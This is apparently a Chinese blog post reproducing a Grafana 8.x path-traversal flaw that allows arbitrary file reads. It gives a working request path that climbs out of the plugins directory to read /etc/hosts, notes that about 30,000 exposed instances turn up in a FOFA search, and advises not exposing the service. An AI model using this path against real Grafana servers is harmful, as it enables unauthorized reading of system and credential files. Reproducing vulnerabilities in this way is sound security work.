Grafana 0day漏洞在野利用记录

1. 漏洞概述

Grafana 0day漏洞在野利用记录_第1张图片

Grafana 是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。需要注意的是该漏洞并不依赖于某个特定的插件,而是因为 Grafana在解析插件路由的时候没有对输入进行有效过滤造成的任意文件读取。

2. 漏洞影响

Grafana 是否受影响
8.x

3. 漏洞复现

本地搭建Grafana v8.2.6环境(搭建流程此处不再阐述),搭建后访问如下:


访问http://127.0.0.1:3001/login抓包,更改原始请求


> exp:/public/plugins/welcome/../../../../../../../../../etc/hosts

成功读取hosts文件,如下Grafana 0day漏洞在野利用记录_第2张图片

3. 影响统计

fofa搜索国内使用Grafana总数,近3w+

Grafana 0day漏洞在野利用记录_第3张图片

4、整改建议

**非必要禁止对外开放该服务。**

你可能感兴趣的:(漏洞复现,安全,web安全,安全漏洞,网络安全)